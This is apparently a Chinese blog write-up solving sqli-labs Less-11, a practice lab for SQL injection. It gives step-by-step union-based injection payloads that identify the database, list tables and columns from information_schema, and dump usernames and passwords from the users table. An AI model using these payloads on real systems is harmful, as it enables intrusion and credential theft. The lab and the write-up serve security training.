[网络安全]sqli-labs Less-11 解题详析

攻击姿势及语法较为简单,不再详细介绍。

判断注入类型

在这里插入图片描述
由上下两张图回显可知,注入类型为字符型注入

在这里插入图片描述


判断注入点个数

在这里插入图片描述

由上下两张图可知注入点个数为2

在这里插入图片描述


查库名

1' union select 1,database()#

在这里插入图片描述

数据库为security


查表名

1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security')#

在这里插入图片描述

回显四个表名


查列名

1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security'and table_name='users')#

在这里插入图片描述


查数据

1' union select group_concat(username),group_concat(password) from security.users#

在这里插入图片描述


总结

以上为[网络安全]sqli-labs Less-11 解题详析,后续将分享[网络安全]sqli-labs Less-12 解题详析,请读者躬身实践。

我是秋说,我们下次见。

猜你喜欢

转载自blog.csdn.net/2301_77485708/article/details/131996930
今日推荐